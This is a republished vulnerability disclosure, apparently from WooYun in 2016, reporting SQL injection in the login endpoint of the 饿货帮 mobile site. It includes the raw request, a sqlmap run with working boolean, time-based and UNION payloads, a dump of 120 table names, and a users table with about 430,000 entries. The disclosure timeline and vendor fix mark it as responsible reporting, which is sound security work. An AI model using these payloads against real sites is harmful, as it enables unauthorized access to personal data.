饿货帮某站存在sql注入涉及43万用户个人详细信息

  • 内容
  • 相关

漏洞详情

披露状态:

 

2016-05-03: 细节已通知厂商并且等待厂商处理中
2016-05-03: 厂商已经确认,细节仅向厂商公开
2016-05-13: 细节向核心白帽子及相关领域专家公开
2016-05-23: 细节向普通白帽子公开
2016-06-02: 细节向实习白帽子公开
2016-06-17: 细节向公众公开

简要描述:

饿货帮由郴州市叁陆伍网络信息咨询有限责任公司独立研发运营,于2015年5月正式发布,致力于农产品特卖平台,目前已与百家农产品深度合作,每天对某些农产品进行限时特卖。

详细说明:

注入点:

code 区域
POST https://m.ehuobang.com/app/ajax/user.php?action=logintel HTTP/1.1
Host: m.ehuobang.com
Proxy-Connection: keep-alive
Content-Length: 77
Accept: text/plain, */*; q=0.01
Origin: http://m.ehuobang.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://m.ehuobang.com/web/my.html
Accept-Encoding: gzip,deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: CNZZDATA1255696897=502322608-1462257812-%7C1462256790

tel=13800139000&pwd=12345&bkurl=http://m.ehuobang.com/web/my.html&random=296

参数tel存在注入:
<code>E:\DIGbug\sqlmap>sqlmap.py -r q1.txt --dbms=mysql --time-sec=5
_
___ ___| |_____ ___ ___ {1.0-dev-nongit-20150831}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program

[*] starting at 15:38:40

[15:38:40] [INFO] parsing HTTP request from 'q1.txt'
[15:38:40] [INFO] testing connection to the target URL
[15:38:43] [INFO] heuristics detected web page charset 'ascii'
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: tel (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: tel=13299417924 AND 6228=6228&pwd=as123.&bkurl=http://m.ehuobang.co
m/web/my.html&random=296

Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: tel=13299417924 AND (SELECT * FROM (SELECT(SLEEP(5)))hvXD)&pwd=as12
3.&bkurl=http://m.ehuobang.com/web/my.html&random=296

Type: UNION query
Title: Generic UNION query (NULL) - 1 column
Payload: tel=-4028 UNION ALL SELECT CONCAT(0x71766a7a71,0x4a656363586f554445
52,0x7171787071)-- &pwd=as123.&bkurl=http://m.ehuobang.com/web/my.html&random=29
6
---



</code>





120张表



code 区域
Database: ehuobangcom
[120 tables]
+-------------------------+
| cms_admins |
| list_menu |
| menu_user |
| sheet1 |
| tb_address |
| tb_admin_record |
| tb_app_friend_mac |
| tb_app_login_record |
| tb_app_record |
| tb_app_weixin |
| tb_area |
| tb_base |
| tb_brand_list |
| tb_city |
| tb_clog |
| tb_collect |
| tb_comment |
| tb_commission_record |
| tb_coupons |
| tb_coupons_appid |
| tb_coupons_free |
| tb_coupons_group |
| tb_coupons_home |
| tb_coupons_money |
| tb_coupons_pop |
| tb_coupons_user |
| tb_deposit |
| tb_deposit_taobao |
| tb_draw_result |
| tb_ehb_order_push |
| tb_error |
| tb_ftitle |
| tb_ftitle_tags |
| tb_friend_invite |
| tb_friend_rank |
| tb_friend_weixin_iphone |
| tb_friend_yd_invite |
| tb_fruit |
| tb_fruit_logs |
| tb_fruit_opportunity |
| tb_fruit_phone |
| tb_group_lottery |
| tb_group_lottery_result |
| tb_groups |
| tb_groups_detail |
| tb_groups_pics |
| tb_imcome |
| tb_income_detail |
| tb_index_base |
| tb_ios_update |
| tb_live |
| tb_live_comment |
| tb_live_zan |
| tb_lottery_friend |
| tb_lottery_logs |
| tb_lottery_share |
| tb_lottry_record |
| tb_match_click |
| tb_match_product |
| tb_match_vote |
| tb_match_weixin |
| tb_message |
| tb_new_title |
| tb_news |
| tb_news_profit |
| tb_news_read |
| tb_order_cart |
| tb_order_list |
| tb_order_service |
| tb_order_service_detail |
| tb_order_service_log |
| tb_orders_notice |
| tb_parent_order |
| tb_partner |
| tb_pay_back_record |
| tb_products |
| tb_products_tags |
| tb_products_yeargoods |
| tb_profit |
| tb_profit_pic |
| tb_promote |
| tb_promote_log |
| tb_province |
| tb_recharge |
| tb_settle |
| tb_settle_detail |
| tb_sms_recode |
| tb_temp_xls |
| tb_tongji_list |
| tb_union_api_log |
| tb_union_golog |
| tb_union_goshop |
| tb_union_notice_log |
| tb_union_order |
| tb_union_push_log |
| tb_union_word |
| tb_upload_orders |
| tb_user_account |
| tb_user_code |
| tb_user_record |
| tb_user_vip |
| tb_users |
| tb_users_carriage |
| tb_users_carriage_rule |
| tb_users_certificates |
| tb_users_forbit |
| tb_vip_top_products |
| tb_vip_user_count |
| tb_wl |
| tb_wl_code |
| tb_wl_fail |
| tb_wl_list |
| tb_wl_poll |
| tb_wl_print |
| tb_wl_printoffset |
| tb_wl_template |
| tb_xg_result |
| tb_yuandan_pic |
| tb_zt_title |
| tb_zwd_money |





43万+用户表:

code 区域
Database: ehuobangcom
+----------+---------+
| Table | Entries |
+----------+---------+
| tb_users | 430317 |
+----------+---------+

 

漏洞证明:

 

QQ截图20160503153852.png

 

修复方案:

开发懂

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2016-05-03 18:21

厂商回复:

已修复,非常感谢兄弟

最新状态:

暂无


本文标签:

版权声明:若无特殊注明,本文皆为《安三》原创,转载请保留文章出处。『鹦鹉搜索』

百度收录:百度未收录『点击提交』

本文链接:饿货帮某站存在sql注入涉及43万用户个人详细信息 - https://www.15qq.cn/wooyun/697.html

发表评论

电子邮件地址不会被公开。 必填项已用*标注

允许邮件通知